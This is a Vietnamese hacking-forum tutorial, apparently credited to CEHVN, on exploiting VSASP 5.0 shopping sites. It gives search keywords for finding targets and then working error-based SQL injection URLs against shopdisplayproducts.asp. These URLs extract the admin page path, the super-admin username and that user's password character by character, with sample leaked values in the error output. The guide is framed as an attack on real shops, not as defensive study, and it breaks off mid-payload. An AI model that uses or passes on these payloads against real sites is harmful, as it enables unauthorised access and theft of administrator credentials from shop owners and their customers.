Tutorial hack lỗi shop VBScript error 'CLng'

Từ Khóa : + shopdisplayproducts.asp?id +shopaddtocart.asp?catalogid=

Site thường là dạng VSASP 5.0

Loại lỗi

Đầu tiên kiếm link trước

Code:

http://victim.com/shopping/shopdisplayproducts.asp?id=1 

Thêm dấu ' vào thì ta được:

Code:

Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' /shop/shopproductfeatures.asp, line 139 

Giờ tìm link admin

Code:

http://victim.com/shopping/shopdisplayproducts.asp?id=1 or 1=(select%20fieldname%20from%20configuration%20where%20left(fie ldname,10)='xadminpage'%20and%20left(fieldvalue,1) ='a') 

Nếu vẫn thấy như cũ thì coi như kí tự đầu tiên trong link shop admin hông phải là a,chọn chữ khác, S chẳng hạn.

Code:

http://victim.com/shopping/shopdisplayproducts.asp?id=1 or 1=(select%20f ieldname%20from%20configuration%20where%20left(fie ldname,10)='xadminpage'%20and%20left(fieldvalue,1) ='s') 

Ta được

Code:

Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value 'xadminpage' to a column of data type int.

/shop/shop$db.asp, line 409 

-Vậy s là ký tự đâu tien của link admin,tiếp tục thế những chữ khác 

Code:

http://victim.com/shopping/shopdisplayproducts.asp?id=1 or1=(select%20f ieldname%20from%20configuration%20where%20left(fie ldname,10)='xadminpage'%20and%20left(fieldvalue,2) ='sh') 

Chú ý chỗ này nha (fieldvalue,2)='sh')

-Cứ tiếp tục thay tiếp vào đê tìm ra link admin. Link admin kết thúc = .asp.

Tìm user + pass admin

Code:

http://victim.com/shopping/shopdisplayproducts.asp?id=1 or1=(select%20f ldusername%20from%20tbluser%20where%20admintype='s uper'%20and%20left(fldusername,1)='a')

Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng'

/shop/shopproductfeatures.asp, line 139 

Không có gì hết tiếp tục như thế

Code:

http://victim.com/shopping/shopdisplayproducts.asp?id=1 or 1=(select%20f ldusername%20from%20tbluser%20where%20admintype='s uper'%20and%20left(fldusername,1)='c')

Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value 'circ54' to a column of data type int. /shop/shop$db.asp, line 409 

Ok,vậy là ra User rồi đó.

Code:

http://victim.com/shopping/shopdisplayproducts.asp?id=1 or 1=(select%20f

ldusername%20from%20tbluser%20where%20admintype='s uper'%20and%20left(fldusername,2)='ab') 

Tìm ký tự thư 2 , thứ 3 thì them vào (fldusername,3)='abc') dậy đó dễ mà. Chúng ta đã có user admin ở trên rồi circ54 tìm pass của nó

Code:

http://victim.com/shopping/shopdisplayproducts.asp?id=1 or 1=(select%20f ldpassword%20from%20tbluser%20where%20fldusername= 'circ54'%20and%20left(fldpassword,1)='a')[/indent][INDENT]Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' /shop/shopproductfeatures.asp, line 13[/INDENT] 

[INDENT]

Không có gì thì thế cái khác vào.

Code:

http://victim.com/shopping/shopdisplayproducts.asp?id=1 or 1=(select%20f ldpassword%20from%20tbluser%20where%20fldusername= 'circ54'%20and%20left(fldpassword,1)='2')

Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value '2005HCP' to a column of data type int. /shop/shop$db.asp, line 409 

[/INDENT]Xong,có được hết tất cả ìno thì vào shop vọc thôi.

Tìm link admin

Code:

or%201=(select%20fieldname%20from%20configurati on%20where%20left(fieldname,10)='xadminpage'%20and %20left(fieldvalue,1)='a') => Đoán kí tự đầu

or%201=(select%20fieldname%20from%20configurati on%20where%20left(fieldname,10)='xadminpage'%20and %20left(fieldvalue,1)='a'%20and%20len(fieldvalue)= 15) => Đoán số kí tự (Hông cần cũng được) 

Tìm user 

Code:

or 1=(select fldusername from tbluser where admintype='super' and left(fldusername,1)='a') => Kí tự đầu

or 1=(select fldusername from tbluser where left(fldusername,1)='b' and len(fldusername)=3) => Số kí tự 

Tìm pass:

Code:

or 1=(select fldpassword from tbluser where fldusername='blue42jh' and left(fldpassword,1)='a') => Kí tự đầu

or 1=(select fldpassword from tbluser where left(fldpassword,1)='b' and len(fldpasswo

Nguồn: CEHVN